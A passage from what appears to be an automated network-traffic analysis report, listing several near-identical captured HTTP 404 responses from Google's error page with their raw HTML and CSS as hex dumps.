74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 